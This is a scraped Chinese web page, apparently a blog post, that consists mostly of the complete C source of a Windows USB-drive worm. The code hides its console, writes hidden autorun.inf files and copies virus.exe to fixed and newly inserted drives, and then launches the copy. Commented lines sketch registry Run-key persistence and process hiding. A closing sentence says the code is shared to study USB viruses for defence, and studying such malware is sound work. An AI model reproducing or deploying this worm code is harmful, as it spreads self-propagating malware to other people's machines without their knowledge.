登 录
#include <windows.h><br /> #include <stdio.h></p> <p>// 设置连接器选项,告诉linker的入口,不要出现控制台<br /> #pragma comment( linker, "/subsystem:/"windows/" /entry:/"mainCRTStartup/"" )</p> <p>#define AUTORUN_INF "[autorun]/r/nopen=virus.exe/r/n"</p> <p>int main(){<br /> int disk,olddisk,i;<br /> UINT Type;<br /> char buf[MAX_PATH];<br /> char filename[MAX_PATH];<br /> DWORD dwWritenSize = 0;<br /> disk = olddisk = GetLogicalDrives();<br /> HMODULE module= GetModuleHandle(0);<br /> GetModuleFileName(module,buf,sizeof(buf));<br /> buf[3]=0;<br /> printf("%s/n",buf);<br /> if(GetDriveType(buf)==DRIVE_REMOVABLE){<br /> for (i=0;i<32;i++)<br /> {<br /> if(disk&1){<br /> sprintf(buf,"%c://",'A'+i);<br /> Type = GetDriveType(buf);<br /> // 取得驱动器的类型<br /> if(Type==DRIVE_FIXED){<br /> sprintf(filename,"%c://autorun.inf",'A'+i);<br /> HANDLE hFile = CreateFile(filename,GENERIC_WRITE<br /> ,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN<br /> |FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM<br /> |FILE_FLAG_WRITE_THROUGH,NULL);<br /> WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),<br /> &dwWritenSize,NULL);<br /> CloseHandle(hFile);<br /> sprintf(filename,"%c://virus.exe",'A'+i);<br /> CopyFile("virus.exe",filename,FALSE);<br /> }<br /> }<br /> disk>>=1;<br /> }</p> <p> //在注册表中加入自启动,比较危险,不建议调试<br /> //RegOpenKey(HKEY_LOCAL_MACHINE,"Software//Microsoft//Windows//CurrentVersion//Run",&RegKey);<br /> //这里加上你需要在注册表中注册的内容<br /> //RegSetValueEx(RegKey,"getip",0,REG_SZ,(const unsigned char*)(LPCTSTR)fullName,fullName.GetLength());<br /> //然后调用远程线程注入函数CreateRemoteThread在进程管理器中隐藏进程<br /> //为了防止该程序被恶意使用,我在这里就不讲解,以省略号代替之</p> <p> //......</p> <p> STARTUPINFO si;<br /> PROCESS_INFORMATION pi;<br /> ZeroMemory(&si,sizeof(si));<br /> si.cb = sizeof(si);<br /> CreateProcess(NULL,"c://virus.exe",NULL,NULL,FALSE<br /> ,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);<br /> }<br /> else{</p> <p> while (true)<br /> {<br /> disk = GetLogicalDrives();<br /> if(disk>olddisk){<br /> disk-=olddisk;<br /> i=0;<br /> while(disk>>=1)i++;<br /> sprintf(filename,"%c://autorun.inf",'A'+i);<br /> HANDLE hFile = CreateFile(filename,GENERIC_WRITE<br /> ,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN<br /> |FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM<br /> |FILE_FLAG_WRITE_THROUGH,NULL);<br /> WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),<br /> &dwWritenSize,NULL);<br /> CloseHandle(hFile);<br /> sprintf(filename,"%c://virus.exe",'A'+i);<br /> CopyFile("virus.exe",filename,FALSE);<br /> }<br /> olddisk = disk;<br /> Sleep(10);<br /> }<br /> }</p> <p> return 0;<br /> }
为了揭露病毒制作者的丑恶行径,决定研究U盘病毒的结构,以更好地防毒。
抱歉!评论已关闭.